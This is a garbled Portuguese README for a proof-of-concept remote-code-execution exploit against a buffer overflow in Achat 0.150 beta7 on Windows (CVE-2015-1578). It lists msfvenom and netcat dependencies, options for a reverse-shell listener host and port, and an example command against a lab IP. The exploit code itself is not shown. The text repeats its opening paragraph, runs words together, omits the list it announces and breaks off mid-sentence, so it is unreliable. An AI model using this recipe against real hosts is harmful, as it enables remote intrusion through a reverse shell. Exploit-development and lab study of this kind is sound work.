
Este é um exploit de prova de conceito para CVE-2015-1578, uma vulnerabilidade de estouro de buffer no Achat 0.150 beta7 no Windows. A exploração leva à execução remota de código por meio de um pacote UDP malicioso.
Este é um exploit de prova de conceito para CVE-2015-1578, uma vulnerabilidade de estouro de buffer no Achat 0.150 beta7 no Windows. A exploração leva à execução remota de código através de um pacote UDP malicioso.
Este PoC tem a intenção de servir como um exemplo limpo, mínimo e bem estruturado de desenvolvimento de exploits. Ele demonstra:
msfvenommsfvenom (parte do Metasploit Framework)rlwrap (para usabilidade aprimorada do Netcat)msfvenomrlwrap nc-i <target_ip> Endereço IP do destino (obrigatório)
-l, --lhost <listener_ip> IP do host local para o reverse shell (obrigatório)
-p, --lport <port> Porta local para o reverse shell (obrigatório)
--rport <port> Porta UDP remota no destino (padrão: 9256)
python3 chatter.py -i 10.10.10.74 -l 10.10.16.7 -p 9393
Isso irá: